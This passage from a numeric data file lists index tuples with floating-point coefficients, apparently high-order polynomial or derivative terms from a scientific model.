[0,1,1,3,3,11 , 7.6044675556e-13],
[0,1,1,4,4,11 , 9.90248311432e-13],
[0,1,1,4,5,6 , -3.51905998721e-12],
[0,1,1,4,5,8 , 2.88224874468e-13],
[0,1,1,4,6 , 1.19204486561e-11],
[0,1,1,4,6,7 , 4.02651170079e-12],
[0,1,1,4,6,9 , 6.91944274583e-13],
[0,1,1,4,7,8 , -9.35383575903e-13],
[0,1,1,4,8 , 2.8734468811e-10],
[0,1,1,4,8,9 , 1.52010286787e-11],
[0,1,1,4,10,11 , 1.74171259458e-11],
[0,1,1,5,5,11 , -4.2749846822e-13],
[0,1,1,5,6,10 , -1.02369869837e-12],
[0,1,1,5,7,11 , 1.78615457878e-13],
[0,1,1,5,8,10 , 1.25048333763e-11],
[0,1,1,5,9,11 , 1.22346972145e-11],
[0,1,1,5,11 , 2.25768300951e-10],
[0,1,1,6,6,11 , -9.53327876909e-13],
[0,1,1,6,7,10 , 2.80021536711e-13],
[0,1,1,6,8,11 , 1.92040375196e-11],
[0,1,1,6,9,10 , 1.97594795207e-11],
[0,1,1,6,10 , 3.83138311386e-10],
[0,1,1,7,7,11 , 3.61465083694e-13],
[0,1,1,7,8,10 , -1.4540800106e-11],
[0,1,1,7,9,11 , -1.42107852601e-11],
[0,1,1,7,11 , -2.69832455188e-10],
[0,1,1,8,8,11 , -1.89637028956e-12],
[0,1,1,8,9,10 , -2.59058996133e-12],
[0,1,1,8,10 , -3.31968814196e-11],
[0,1,1,9,9,11 , -3.19381916761e-12],
[0,1,1,9,11 , -4.42872233684e-11],
[0,1,1,10,10,11 , 2.76687598443e-12],
[0,1,1,11 , -3.73774260318e-10],
[0,1,1,11,11,11 , 2.10937827611e-12],
[0,1,2,2,2,4 , 5.95493589464e-12],
[0,1,2,2,2,10 , -1.33627615773e-13],
[0,1,2,2,3 , 1.28720100785e-11],
[0,1,2,2,3,5 , -4.20975423102e-12],
[0,1,2,2,3,7 , 4.90864522654e-12],
[0,1,2,2,3,9 , 1.16954780508e-12],
[0,1,2,3,3,4 , 5.1946263277e-12],
[0,1,2,3,3,10 , -3.92111129031e-13],
[0,1,2,4 , -4.14977607936e-09],
[0,1,2,4,4,4 , 3.71368128748e-12],
[0,1,2,4,4,10 , -7.80901185519e-13],
[0,1,2,4,5 , -2.83848258758e-12],
[0,1,2,4,5,5 , 2.2563288653e-12],
[0,1,2,4,5,7 , -2.59772897282e-12],
[0,1,2,4,5,9 , -1.87116573284e-13],
[0,1,2,4,6,6 , 5.30025255607e-12],
[0,1,2,4,6,8 , -3.97954453388e-13],
[0,1,2,4,7 , 6.72691892722e-12],
[0,1,2,4,7,7 , 2.98166507316e-12],
[0,1,2,4,7,9 , 8.7380371784e-13],
[0,1,2,4,8,8 , -1.57719945374e-11],
[0,1,2,4,9 , -2.96642668112e-10],
[0,1,2,4,9,9 , -1.56975108142e-11],
[0,1,2,4,10,10 , -1.79029904086e-11],
[0,1,2,4,11,11 , -1.78396285924e-11],
[0,1,2,5,5,10 , 8.91754257764e-13],
[0,1,2,5,6,11 , 1.02703032837e-12],
[0,1,2,5,7,10 , -4.38192296079e-13],
[0,1,2,5,8,11 , -1.27450732547e-11],
[0,1,2,5,9,10 , -1.2826933431e-11],
[0,1,2,5,10 , -2.44439185333e-10],
[0,1,2,6,6,10 , 1.43739901836e-12],
[0,1,2,6,7,11 , -2.7845675034e-13],
[0,1,2,6,8,10 , -1.97344233454e-11],
[0,1,2,6,9,11 , -1.97733565885e-11],
[0,1,2,6,11 , -3.75759983502e-10],
[0,1,2,7,7,10 , -4.08378826746e-13],
[0,1,2,7,8,11 , 1.49132875098e-11],
[0,1,2,7,9,10 , 1.4869636638e-11],
[0,1,2,7,10 , 2.88313101802e-10],
[0,1,2,8,8,10 , 1.81207193632e-12],
[0,1,2,8,9,11 , 2.302456893e-12],
[0,1,2,8,11 , 1.7789953781e-11],
[0,1,2,9,9,10 , 2.59968602042e-12],
[0,1,2,9,10 , 2.82647761966e-11],
[0,1,2,10 , 6.5080948097e-13],
[0,1,2,10,10,10 , -2.95345585535e-12],
[0,1,2,10,11,11 , -2.78357125253e-12],
[0,1,3 , -2.53914916777e-08],
[0,1,3,3,3 , 2.41085177229e-11],
[0,1,3,3,3,5 , -3.34997545142e-12],
[0,1,3,3,3,7 , 3.7663250479e-12],
[0,1,3,3,3,9 , 1.43036697262e-12],
[0,1,3,4,4 , 3.46386306461e-11],
[0,1,3,4,4,5 , -2.88308814977e-12],
[0,1,3,4,4,7 , 3.0812660039e-12],
[0,1,3,4,4,9 , 1.53546776606e-12],
[0,1,3,4,5,10 , -9.20232881105e-14],
[0,1,3,4,6,11 , 1.63409530881e-13],
[0,1,3,4,7,10 , -5.68982876874e-13],
[0,1,3,4,8,11 , 1.56293295142e-11],
[0,1,3,4,9,10 , 1.55765985315e-11],
[0,1,3,4,10 , 2.9567554511e-10],
[0,1,3,5 , 2.55602633244e-09],
[0,1,3,5,5 , 1.29051635141e-11],
[0,1,3,5,5,5 , -2.07208909516e-12],
[0,1,3,5,5,7 , 2.02506387755e-12],
[0,1,3,5,5,9 , 5.69085976834e-14],
[0,1,3,5,6,6 , -3.96582772243e-12],
[0,1,3,5,6,8 , -1.57572689426e-13],
[0,1,3,5,7 , -4.32506883401e-12],
[0,1,3,5,7,7 , -2.29806046989e-12],
[0,1,3,5,7,9 , -3.45315230037e-13],
[0,1,3,5,8,8 , 1.17842384249e-11],
[0,1,3,5,9 , 2.10843447132e-10],
[0,1,3,5,9,9 , 1.14343466753e-11],
[0,1,3,5,10,10 , 1.25504211016e-11],
[0,1,3,5,11,11 , 1.23597450825e-11],
[0,1,3,6,6 , -3.58501204788e-12],
[0,1,3,6,6,7 , 4.67109588261e-12],
[0,1,3,6,6,9 , 3.23430321626e-13],
[0,1,3,6,7,8 , -6.26899928453e-13],
[0,1,3,6,8 , 3.3756782904e-10],
[0,1,3,6,8,9 , 1.76840770354e-11],
[0,1,3,6,10,11 , 1.93380226992e-11],
[0,1,3,7 , -3.52102975077e-09],
[0,1,3,7,7 , 6.72340969034e-12],
[0,1,3,7,7,7 , 2.69443077085e-12],
[0,1,3,7,7,9 , 1.00260683073e-12],
[0,1,3,7,8,8 , -1.35247786881e-11],
[0,1,3,7,9 , -2.43729065068e-10],
[0,1,3,7,9,9 , -1.3035052563e-11],
[0,1,3,7,10,10 , -1.4851252587e-11],
[0,1,3,7,11,11 , -1.47091030825e-11],
[0,1,3,8,8 , -7.93897507477e-11],
[0,1,3,8,8,9 , -4.64543900792e-12],
[0,1,3,8,10,11 , 2.23018484779e-14],
[0,1,3,9 , -1.85550535072e-09],
[0,1,3,9,9 , -1.00399242125e-10],
[0,1,3,9,9,9 , -5.16516037523e-12],
[0,1,3,9,10,10 , -3.59914581628e-13],
[0,1,3,9,11,11 , -6.21919604332e-13],
[0,1,3,10,10 , 1.76698003321e-11],
[0,1,3,11,11 , 1.40732574451e-11],
[0,2,2,2,2,11 , -5.0552144682e-13],
[0,2,2,2,3,6 , 6.3836274e-12],
[0,2,2,2,3,8 , -9.94418705862e-13],
[0,2,2,3,3,11 , 1.20070094449e-13],
[0,2,2,4,4,11 , 7.0812279824e-13],
[0,2,2,4,5,6 , -3.64698573659e-12],
[0,2,2,4,5,8 , 5.00784773821e-14],
[0,2,2,4,6 , -1.26606680255e-12],
[0,2,2,4,6,7 , 4.1011803974e-12],
[0,2,2,4,6,9 , 3.33349887462e-13],
[0,2,2,4,7,8 , -7.18927556246e-13],
[0,2,2,4,8 , 3.01494279243e-10],
[0,2,2,4,8,9 , 1.61401317222e-11],
[0,2,2,4,10,11 , 1.83156091124e-11],
[0,2,2,5,5,11 , -1.32293425231e-12],
[0,2,2,5,6,10 , -1.00495482868e-12],
[0,2,2,5,7,11 , 6.21687800292e-13],
[0,2,2,5,8,10 , 1.29589000272e-11],
[0,2,2,5,9,11 , 1.32788525465e-11],
[0,2,2,5,11 , 2.55248724053e-10],
[0,2,2,6,6,11 , -1.59345863305e-12],
[0,2,2,6,7,10 , 1.87258582455e-13],
[0,2,2,6,8,11 , 2.01624560185e-11],
[0,2,2,6,9,10 , 2.00033926685e-11],
[0,2,2,6,10 , 3.7947424466e-10],
[0,2,2,7,7,11 , 2.60631335203e-13],
[0,2,2,7,8,10 , -1.53138128908e-11],
[0,2,2,7,9,11 , -1.55506426129e-11],
[0,2,2,7,11 , -3.02719432918e-10],
[0,2,2,8,8,11 , -1.70064108517e-12],
[0,2,2,8,9,10 , -2.08128386594e-12],
[0,2,2,8,10 , -9.37185549575e-12],
[0,2,2,9,9,11 , -1.99968295343e-12],
[0,2,2,9,11 , -1.24104284135e-12],
[0,2,2,10,10,11 , 2.36317822683e-12],
[0,2,2,11 , 1.0158648426e-09],
[0,2,2,11,11,11 , 3.02937579686e-12],
[0,2,3,3,3,6 , 5.35178762158e-12],
[0,2,3,3,3,8 , -1.18580662812e-12],
[0,2,3,4,4,6 , 4.48686594744e-12],
[0,2,3,4,4,8 , -1.52161398534e-12],
[0,2,3,4,5,11 , 7.37707722934e-14],
[0,2,3,4,6,10 , -3.05114550312e-14],
[0,2,3,4,7,11 , 5.36841889443e-13],
[0,2,3,4,8,10 , -1.60236616741e-11],
[0,2,3,4,9,11 , -1.60242655258e-11],
[0,2,3,4,11 , -3.02949896796e-10],
[0,2,3,5,5,6 , 2.71781573421e-12],
[0,2,3,5,5,8 , 3.20380273824e-13],
[0,2,3,5,6 , 6.54071268116e-13],
[0,2,3,5,6,7 , -3.13817078645e-12],
[0,2,3,5,6,9 , -5.51795242268e-14],
[0,2,3,5,7,8 , 2.48779350023e-13],
[0,2,3,5,8 , -2.26166140701e-10],
[0,2,3,5,8,9 , -1.18414945492e-11],
[0,2,3,5,10,11 , -1.28038092374e-11],
[0,2,3,6 , -4.6821218473e-09],
[0,2,3,6,6,6 , 6.4895874384e-12],
[0,2,3,6,6,8 , 8.52476847459e-14],
[0,2,3,6,7 , -2.81587691745e-12],
[0,2,3,6,7,7 , 3.71644882162e-12],
[0,2,3,6,7,9 , 6.79689714728e-13],
[0,2,3,6,8,8 , -1.82263470301e-11],
[0,2,3,6,9 , -3.4163537875e-10],
[0,2,3,6,9,9 , -1.81421146411e-11],
[0,2,3,6,10,10 , -1.97962505432e-11],
[0,2,3,6,11,11 , -1.97997609376e-11],
[0,2,3,7,7,8 , -1.00016431929e-12],
[0,2,3,7,8 , 2.63901657863e-10],
[0,2,3,7,8,9 , 1.35751507255e-11],
[0,2,3,7,10,11 , 1.51200206576e-11],
[0,2,3,8 , 1.24988966555e-09],
[0,2,3,8,8,8 , 4.08739909548e-12],
[0,2,3,8,9 , 8.41347636881e-11],
[0,2,3,8,9,9 , 5.19304327675e-12],
[0,2,3,8,10,10 , -4.14667652014e-13],
[0,2,3,8,11,11 , -1.78220342266e-13],
[0,2,3,9,10,11 , 2.34824173932e-13],
[0,2,3,10,11 , -2.69949118719e-11],
[0,3,3,3,3,11 , 8.29967288969e-13],
[0,3,3,4,4,11 , 9.57631534621e-13],
[0,3,3,4,5,6 , -2.98225247832e-12],
[0,3,3,4,5,8 , 6.79219246792e-13],
[0,3,3,4,6 , 3.53534257767e-11],
[0,3,3,4,6,7 , 3.18412626326e-12],
[0,3,3,4,6,9 , 1.36577590471e-12],
[0,3,3,4,7,8 , -1.40550274511e-12],
[0,3,3,4,8 , 2.84655145298e-10],
[0,3,3,4,8,9 , 1.44727380771e-11],
[0,3,3,4,10,11 , 1.51682004909e-11],
[0,3,3,5,5,11 , -4.03661294756e-13],
[0,3,3,5,6,10 , -5.79030929279e-13],
[0,3,3,5,7,11 , 7.73819766537e-14],
[0,3,3,5,8,10 , 1.10797522688e-11],
[0,3,3,5,9,11 , 1.09167059313e-11],
[0,3,3,5,11 , 2.01923244328e-10],
[0,3,3,6,6,11 , -7.27576523439e-13],
[0,3,3,6,7,10 , -6.56547333827e-15],
[0,3,3,6,8,11 , 1.69341700292e-11],
[0,3,3,6,9,10 , 1.69469132513e-11],
[0,3,3,6,10 , 3.18301326311e-10],
[0,3,3,7,7,11 , 3.77391135055e-13],
[0,3,3,7,8,10 , -1.29202889564e-11],
[0,3,3,7,9,11 , -1.2657897928e-11],
[0,3,3,7,11 , -2.37134810442e-10],
[0,3,3,8,8,11 , -2.76111826271e-12],
[0,3,3,8,9,10 , -2.92799879821e-12],
[0,3,3,8,10 , -4.44411635381e-11],
[0,3,3,9,9,11 , -3.54114503177e-12],
[0,3,3,9,11 , -6.02046164424e-11],
[0,3,3,10,10,11 , 2.07990854148e-12],
[0,3,3,11 , -1.37443379481e-09],
[0,3,3,11,11,11 , 1.8373164673e-12],
[0,4,4,4,4,11 , 3.71182470965e-12],
[0,4,4,4,5,6 , -1.21444674967e-11],
[0,4,4,4,5,8 , 3.27554393994e-12],
[0,4,4,4,6 , 1.32952375699e-10],
[0,4,4,4,6,7 , 1.31233056175e-11],
[0,4,4,4,6,9 , 5.47766058454e-12],
[0,4,4,4,7,8 , -4.98842174759e-12],
[0,4,4,4,8 , 6.3971149602e-10],
[0,4,4,4,8,9 , 3.36989699749e-11],
[0,4,4,4,10,11 , 3.66327179536e-11],
[0,4,4,5,5,11 , -3.44705450963e-13],
[0,4,4,5,6,10 , -5.5740264706e-13],
[0,4,4,5,7,11 , -6.13092716755e-13],
[0,4,4,5,8,10 , 2.65631917031e-11],
[0,4,4,5,9,11 , 2.67240681297e-11],
[0,4,4,5,11 , 4.92650024531e-10],
[0,4,4,6,6,11 , -1.37782566245e-13],
[0,4,4,6,7,10 , -1.16640535708e-12],
[0,4,4,6,8,11 , 4.07300895033e-11],
[0,4,4,6,9,10 , 4.08350970595e-11],
[0,4,4,6,10 , 7.58559167699e-10],
[0,4,4,7,7,11 , 2.40221406739e-12],
[0,4,4,7,8,10 , -3.04006216057e-11],
[0,4,4,7,9,11 , -3.01128210694e-11],
[0,4,4,7,11 , -5.63783740511e-10],
[0,4,4,8,8,11 , -7.06590017962e-12],
[0,4,4,8,9,10 , -8.2670428696e-12],
[0,4,4,8,10 , -1.57502889513e-10],
[0,4,4,9,9,11 , -8.9900433045e-12],
[0,4,4,9,11 , -1.84719451048e-10],
[0,4,4,10,10,11 , 3.825863722e-12],
[0,4,4,11 , -5.02650223456e-09],
[0,4,4,11,11,11 , 4.17558959214e-12],
[0,4,5,5,5,6 , -7.26502653347e-12],
[0,4,5,5,5,8 , -8.65775002895e-13],
[0,4,5,5,6 , 1.91397295669e-12],
[0,4,5,5,6,7 , 8.23067108797e-12],
[0,4,5,5,6,9 , -2.31697766242e-13],
[0,4,5,5,7,8 , 6.34846923782e-14],
[0,4,5,5,8 , 3.50463155995e-10],
[0,4,5,5,8,9 , 1.93477136421e-11],
[0,4,5,5,10,11 , 2.15479607422e-11],
[0,4,5,6 , 5.66393299284e-09],
[0,4,5,6,6,6 , -1.67069739409e-11],
[0,4,5,6,6,8 , -4.02264816693e-13],
[0,4,5,6,7 , 2.18021761398e-12],
[0,4,5,6,7,7 , -9.53533105875e-12],
[0,4,5,6,7,9 , -9.24306625497e-13],
[0,4,5,6,8,8 , 2.92469480361e-11],
[0,4,5,6,9 , 5.3734315177e-10],
[0,4,5,6,9,9 , 2.96218642641e-11],
[0,4,5,6,10,10 , 3.31076500033e-11],
[0,4,5,6,11,11 , 3.33021270427e-11],
[0,4,5,7,7,8 , 1.52125068709e-12],
[0,4,5,7,8 , -4.11185559433e-10],
[0,4,5,7,8,9 , -2.1896811716e-11],
[0,4,5,7,10,11 , -2.51504006521e-11],
[0,4,5,8 , -2.22408322244e-09],
[0,4,5,8,8,8 , -3.75488797088e-12],
[0,4,5,8,9 , -1.08998028253e-10],
[0,4,5,8,9,9 , -5.96041482036e-12],
[0,4,5,8,10,10 , 3.47235485415e-12],
[0,4,5,8,11,11 , 3.52830283314e-12],
[0,4,5,9,10,11 , 2.45603590781e-12],
[0,4,5,10,11 , 8.13877804611e-11],
[0,4,6 , -1.0825523261e-07],
[0,4,6,6,6 , -2.72611307889e-11],
[0,4,6,6,6,7 , 1.97190913288e-11],
[0,4,6,6,6,9 , 5.67606960538e-13],
[0,4,6,6,7,8 , -1.49824473838e-12],
[0,4,6,6,8 , 8.17972916446e-10],
[0,4,6,6,8,9 , 4.49264417096e-11],
[0,4,6,6,10,11 , 5.13657576544e-11],
[0,4,6,7 , -7.75483055807e-09],
[0,4,6,7,7 , 1.78407730422e-11],
[0,4,6,7,7,7 , 1.10091750224e-11],
[0,4,6,7,7,9 , 2.62791849136e-12],
[0,4,6,7,8,8 , -3.37856069125e-11],
[0,4,6,7,9 , -6.1606555473e-10],
[0,4,6,7,9,9 , -3.3486055053e-11],
[0,4,6,7,10,10 , -3.91684419897e-11],
[0,4,6,7,11,11 , -3.91854474703e-11],
[0,4,6,8,8 , -1.75275907303e-10],
[0,4,6,8,8,9 , -1.06431277834e-11],
[0,4,6,8,10,11 , 2.26729737399e-12],
[0,4,6,9 , -4.76584915391e-09],
[0,4,6,9,9 , -2.27388938072e-10],
[0,4,6,9,9,9 , -1.24731589892e-11],
[0,4,6,9,10,10 , 1.13406358291e-12],
[0,4,6,9,11,11 , 1.24191304407e-12],
[0,4,6,10,10 , 1.01644144925e-10],
[0,4,6,11,11 , 9.4681433027e-11],
[0,4,7,7,7,8 , -2.99531195512e-12],
[0,4,7,7,8 , 4.61596287111e-10],
[0,4,7,7,8,9 , 2.47331134406e-11],
[0,4,7,7,10,11 , 2.95742398946e-11],
[0,4,7,8 , 4.88332151806e-09],
[0,4,7,8,8,8 , 1.16135843311e-11],
[0,4,7,8,9 , 2.31636925336e-10],
[0,4,7,8,9,9 , 1.29165789966e-11],
[0,4,7,8,10,10 , 2.62826471208e-12],
[0,4,7,8,11,11 , 2.63714271351e-12],
[0,4,7,9,10,11 , 3.39950356132e-12],
[0,4,7,10,11 , 1.34019443251e-11],
[0,4,8 , -8.00613253629e-07],
[0,4,8,8 , -1.45727510441e-19],
[0,4,8,8,8 , -1.99842356241e-09],
[0,4,8,8,8,9 , -8.73496187832e-11],
[0,4,8,8,10,11 , -9.60371264378e-11],
[0,4,8,9 , -4.53992551792e-08],
[0,4,8,9,9 , -1.98290289226e-09],
[0,4,8,9,9,9 , -8.75365611249e-11],
[0,4,8,9,10,10 , -9.65893788137e-11],
[0,4,8,9,11,11 , -9.67415004682e-11],
[0,4,8,10,10 , -2.16746221261e-09],
[0,4,8,11,11 , -2.17746601662e-09],
[0,4,9 , 1.30159847235e-18],
[0,4,9,9 , 1.47012742318e-19],
[0,4,9,9,10,11 , -9.7038212963e-11],
[0,4,9,10,11 , -2.1776202474e-09],
[0,4,10,10 , -7.60511923133e-20],
[0,4,10,10,10,11 , -1.04519898256e-10],
[0,4,10,11 , -4.88865016184e-08],
[0,4,10,11,11,11 , -1.04807753474e-10],
[0,4,11 , 5.53747789267e-20],
[0,4,11,11 , 7.70303673634e-20],
[0,5 , 1.86347248396e-20],
[0,5,5,5,5,11 , -3.92000249573e-12],
[0,5,5,5,6,10 , -2.80699845077e-12],
[0,5,5,5,7,11 , 2.60131665767e-12],
[0,5,5,5,8,10 , 1.43885337761e-11],
[0,5,5,5,9,11 , 1.56947316547e-11],
[0,5,5,5,11 , 3.19809203679e-10],
[0,5,5,6,6,11 , -3.33842155183e-12],
[0,5,5,6,7,10 , 2.00312238025e-12],
[0,5,5,6,8,11 , 2.35476239885e-11],
[0,5,5,6,9,10 , 2.37599937389e-11],
[0,5,5,6,10 , 4.47429125005e-10],
[0,5,5,7,7,11 , -1.17992411069e-12],
[0,5,5,7,8,10 , -1.77406595956e-11],
[0,5,5,7,9,11 , -1.81664891252e-11],
[0,5,5,7,11 , -3.61755330066e-10],
[0,5,5,8,8,11 , 3.5621629319e-12],
[0,5,5,8,9,10 , 2.72930913427e-12],
[0,5,5,8,10 , 1.13846777837e-10],
[0,5,5,9,9,11 , 2.74209970714e-12],
[0,5,5,9,11 , 9.36316954769e-11],
[0,5,5,10,10,11 , 8.30371283351e-12],
[0,5,5,11 , 2.61303477792e-09],
[0,5,5,11,11,11 , 9.12097457748e-12],
[0,5,6,6,6,10 , -4.35509161212e-12],
[0,5,6,6,7,11 , 2.04758553885e-12],
[0,5,6,6,8,10 , 3.61601615926e-11],
[0,5,6,6,9,11 , 3.64656916779e-11],
[0,5,6,6,11 , 6.87291859358e-10],
[0,5,6,7,7,10 , -3.90761128724e-13],
[0,5,6,7,8,11 , -2.77086441005e-11],
[0,5,6,7,9,10 , -2.77261773797e-11],
[0,5,6,7,10 , -5.34618317497e-10],
[0,5,6,8,8,10 , 2.81223123908e-12],
[0,5,6,8,9,11 , 1.92693920398e-12],
[0,5,6,8,11 , 1.02642929109e-10],
[0,5,6,9,9,10 , 1.12481774942e-12],
[0,5,6,9,10 , 7.94927714964e-11],
[0,5,6,10 , 3.01287834074e-09],
[0,5,6,10,10,10 , 1.11730248581e-11],
[0,5,6,10,11,11 , 1.04175728236e-11],
[0,5,7,7,7,11 , -3.73839297434e-13],
[0,5,7,7,8,10 , 2.08532282024e-11],
[0,5,7,7,9,11 , 2.09914487805e-11],
[0,5,7,7,11 , 4.16255169879e-10],
[0,5,7,8,8,11 , 9.22496874151e-13],
[0,5,7,8,9,10 , 1.55234839125e-12],
[0,5,7,8,10 , -1.76531599671e-11],
[0,5,7,9,9,11 , 1.82559980697e-12],
[0,5,7,9,11 , -1.24193113787e-11],
[0,5,7,10,10,11 , -4.51560826846e-12],
[0,5,7,11 , -1.36683753335e-09],
[0,5,7,11,11,11 , -4.63670082365e-12],
[0,5,8 , -2.87858853168e-20],
[0,5,8,8,8,10 , -6.92522321572e-11],
[0,5,8,8,9,11 , -7.03792786266e-11],
[0,5,8,8,11 , -1.57106376594e-09],
[0,5,8,9,9,10 , -7.04746563921e-11],
[0,5,8,9,10 , -1.57033964821e-09],
[0,5,8,10 , -3.54130357284e-08],
[0,5,8,10,10,10 , -7.59006520678e-11],
[0,5,8,10,11,11 , -7.64995611858e-11],
[0,5,8,11 , -2.80000637349e-20],
[0,5,9,9,9,11 , -7.14898239667e-11],
[0,5,9,9,11 , -1.58138695325e-09],
[0,5,9,10 , 3.06273961555e-20],
[0,5,9,10,10,11 , -7.70848643627e-11],
[0,5,9,11 , -3.52618931153e-08],
[0,5,9,11,11,11 , -7.77048365252e-11],
[0,5,10 , -4.32264735786e-19],
[0,5,10,10,11 , -1.73752122184e-09],
[0,5,11 , -5.7478067489e-07],
[0,5,11,11,11 , -1.75943923619e-09],
[0,6,6,6,6,11 , -5.5697180215e-12],
[0,6,6,6,7,10 , 2.00145873512e-12],
[0,6,6,6,8,11 , 5.5966774996e-11],
[0,6,6,6,9,10 , 5.70529992921e-11],
[0,6,6,6,10 , 1.09716194545e-09],
[0,6,6,7,7,11 , 2.22657933416e-13],
[0,6,6,7,8,10 , -4.28127078577e-11],
[0,6,6,7,9,11 , -4.26728610755e-11],
[0,6,6,7,11 , -8.30581150703e-10],
[0,6,6,8,8,11 , 9.78363058442e-13],
[0,6,6,8,9,10 , -1.8960320003e-13],
[0,6,6,8,10 , 1.04178656255e-10],
[0,6,6,9,9,11 , -1.12317928056e-12],
[0,6,6,9,11 , 7.62108865635e-11],
[0,6,6,10,10,11 , 1.26980442514e-11],
[0,6,6,11 , 4.44260821218e-09],
[0,6,6,11,11,11 , 1.23893442496e-11],
[0,6,7,7,7,10 , -1.62881958925e-12],
[0,6,7,7,8,11 , 3.22263485504e-11],
[0,6,7,7,9,10 , 3.22452048117e-11],
[0,6,7,7,10 , 6.40085053066e-10],
[0,6,7,8,8,10 , 4.2091357874e-12],
[0,6,7,8,9,11 , 4.88471949117e-12],
[0,6,7,8,11 , 2.63270260458e-11],
[0,6,7,9,9,10 , 6.29462496615e-12],
[0,6,7,9,10 , 4.62334492857e-11],
[0,6,7,10 , -1.58724040714e-09],
[0,6,7,10,10,10 , -3.31822449589e-12],
[0,6,7,10,11,11 , -4.01923855472e-12],
[0,6,8,8,8,11 , -1.07185447699e-10],
[0,6,8,8,9,10 , -1.07805043023e-10],
[0,6,8,8,10 , -2.40993378121e-09],
[0,6,8,9,9,11 , -1.08144680366e-10],
[0,6,8,9,11 , -2.41769094887e-09],
[0,6,8,10 , -1.28730396419e-19],
[0,6,8,10,10,11 , -1.18200628608e-10],
[0,6,8,11 , -5.43035820422e-08],
[0,6,8,11,11,11 , -1.18076404532e-10],
[0,6,9 , -9.29353961816e-20],
[0,6,9,9 , -1.14217098981e-20],
[0,6,9,9,9,10 , -1.09491086694e-10],
[0,6,9,9,10 , -2.4341243561e-09],
[0,6,9,10 , -5.4968709656e-08],
[0,6,9,10,10,10 , -1.1991486384e-10],
[0,6,9,10,11,11 , -1.19325756523e-10],
[0,6,9,11 , 1.32933301111e-19],
[0,6,10 , -9.13250777629e-07],
[0,6,10,10 , 1.20185207101e-20],
[0,6,10,10,10 , -2.71420171118e-09],
[0,6,10,11,11 , -2.7053297782e-09],
[0,6,11 , 7.5563279829e-19],
[0,7,7,7,7,11 , 1.54027463154e-12],
[0,7,7,7,8,10 , -2.39808329182e-11],
[0,7,7,7,9,11 , -2.42068349906e-11],
[0,7,7,7,11 , -4.82542021316e-10],
[0,7,7,8,8,11 , -7.10956488925e-12],
[0,7,7,8,9,10 , -7.42401656346e-12],
[0,7,7,8,10 , -1.00459774909e-10],
[0,7,7,9,9,11 , -8.03820401144e-12],
[0,7,7,9,11 , -9.90158944535e-11],
[0,7,7,10,10,11 , -1.22033279238e-12],
[0,7,7,11 , -8.41249499394e-10],
[0,7,7,11,11,11 , -1.79340678117e-12],
[0,7,8 , 4.68779796746e-20],
[0,7,8,8,8,10 , 8.11417813893e-11],
[0,7,8,8,9,11 , 8.12710928213e-11],
[0,7,8,8,11 , 1.83676263604e-09],
[0,7,8,9,9,10 , 8.10533844875e-11],
[0,7,8,9,10 , 1.82716023117e-09],
[0,7,8,10 , 4.18526755122e-08],
[0,7,8,10,10,10 , 9.0499347683e-11],
[0,7,8,10,11,11 , 9.03001447595e-11],
[0,7,8,11 , 3.21541647712e-20],
[0,7,9,9,9,11 , 8.22893951837e-11],
[0,7,9,9,11 , 1.83442500179e-09],
[0,7,9,10 , -3.7053141949e-20],
[0,7,9,10,10,11 , 9.08209901536e-11],
[0,7,9,11 , 4.16148213554e-08],
[0,7,9,11,11,11 , 9.16996162617e-11],
[0,7,10 , 5.39718806079e-19],
[0,7,10,10,11 , 2.07227857811e-09],
[0,7,11 , 7.40471712835e-07],
[0,7,11,11,11 , 2.09847506182e-09],
[0,8,8,8,8,11 , 1.9679786358e-11],
[0,8,8,8,9,10 , 2.23389658176e-11],
[0,8,8,8,10 , 3.25379838392e-10],
[0,8,8,9,9,11 , 2.46952553069e-11],
[0,8,8,9,11 , 4.09438630213e-10],
[0,8,8,10 , 3.06015467614e-20],
[0,8,8,10,10,11 , -5.44159554444e-12],
[0,8,8,11 , 6.22265222269e-09],
[0,8,8,11,11,11 , -4.92625741233e-12],
[0,8,9 , 1.32878293601e-20],
[0,8,9,9,9,10 , 2.77923068836e-11],
[0,8,9,9,10 , 4.62391266442e-10],
[0,8,9,10 , 7.77459744636e-09],
[0,8,9,10,10,10 , -2.62294175732e-12],
[0,8,9,10,11,11 , -2.60828323854e-12],
[0,8,10 , 1.08877431834e-07],
[0,8,10,10,10 , -2.960432433e-10],
[0,8,10,11,11 , -2.64360002833e-10],
[0,8,11 , 1.02808623973e-19],
[0,9,9,9,9,11 , 2.97184604452e-11],
[0,9,9,9,11 , 5.16830922431e-10],
[0,9,9,10 , -1.76917389413e-20],
[0,9,9,10,10,11 , 2.59378809603e-13],
[0,9,9,11 , 8.68913611022e-09],
[0,9,9,11,11,11 , -4.4913315202e-14],
[0,9,10 , -8.02563717523e-20],
[0,9,10,10,11 , -2.06346236146e-10],
[0,9,11 , 1.09920552347e-07],
[0,9,11,11,11 , -2.08550130633e-10],
[0,10 , -3.55753837847e-20],
[0,10,10,10 , -2.38840130069e-20],
[0,10,10,10,10,11 , -2.94435072383e-11],
[0,10,10,11 , -1.08009930948e-08],
[0,10,10,11,11,11 , -2.91895109997e-11],
[0,10,11 , -2.30287082535e-20],
[0,11 , -4.40457132572e-20],
[0,11,11,11 , -1.14657193435e-08],
[0,11,11,11,11,11 , -2.81155034863e-11],
[1,1 , 1.87435255668e-05],
[1,1,1,1 , 1.90415511274e-08],
[1,1,1,1,1,1 , -4.72066179417e-11],
[1,1,1,1,2,2 , -4.14994515695e-11],
[1,1,1,1,3,3 , -3.1970396278e-11],
[1,1,1,1,4,4 , -7.64238936818e-12],
[1,1,1,1,4,10 , 4.2159253242e-13],
[1,1,1,1,5 , -2.08779218791e-11],
[1,1,1,1,5,5 , -2.65826337341e-12],
[1,1,1,1,5,7 , 2.69306201921e-12],
[1,1,1,1,5,9 , -2.22560102688e-12],
[1,1,1,1,6,6 , -6.98265944028e-12],
[1,1,1,1,6,8 , -3.02998777475e-12],
[1,1,1,1,7 , 4.94472467402e-11],
[1,1,1,1,7,7 , -2.05310515998e-12],
[1,1,1,1,7,9 , 1.19614122431e-12],
[1,1,1,1,8,8 , 5.48325017142e-11],
[1,1,1,1,9 , 1.16706558696e-09],
[1,1,1,1,9,9 , 5.59238271362e-11],
[1,1,1,1,10,10 , 6.16912487343e-11],
[1,1,1,1,11,11 , 6.37942059201e-11],
[1,1,1,2,4,11 , -7.54587141139e-13],
[1,1,1,2,5,6 , 3.23371220994e-12],
[1,1,1,2,5,8 , 2.77861007111e-12],
[1,1,1,2,6 , 9.74457079681e-11],
[1,1,1,2,6,7 , -3.28279202993e-12],
[1,1,1,2,6,9 , 3.45934646783e-12],
[1,1,1,2,7,8 , -8.08025320491e-13],
[1,1,1,2,8 , -1.12800413001e-09],
